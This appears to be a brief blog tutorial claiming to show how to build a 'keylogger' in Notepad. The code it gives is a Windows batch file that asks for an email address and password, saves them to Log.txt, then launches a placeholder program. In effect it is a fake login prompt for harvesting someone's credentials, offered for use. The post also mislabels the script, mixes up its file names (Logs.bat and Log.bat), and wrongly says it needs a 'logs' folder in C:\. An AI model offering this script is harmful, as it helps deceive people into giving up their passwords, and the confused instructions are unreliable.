How To Create a Keylogger In NotepadThe method is very simple and easy and you don’t need any tool to this just a notepad and a little code given below is enough for this. So just follow the post below to proceed.
Creating Keylogger With Notepad
- First of all you need to open notepad in your windows by pressing Window button and then entering notepad.
- Now in notepad copy and paste the below code in it.
echo Please Enter Your Email Address And Password
set /p user=Username:
set /p pass=Password:
echo Username=”%user%” Password=”%pass%” >> Log.txt
start >>Program Here<<
- Now save this file as Logs.bat in your desktop.
- Now create a new folder named logs. (Note that keylogger will only work if the folder name is logs).
- Cut this folder and paste it into drive C:\ .
- Now test your file Log.bat and then after entering the Username and password open the folder in C drive and see all saved key logs there as a text file created there automatically.
- Thats it you are done, you have successfully created a keylogger in notepad.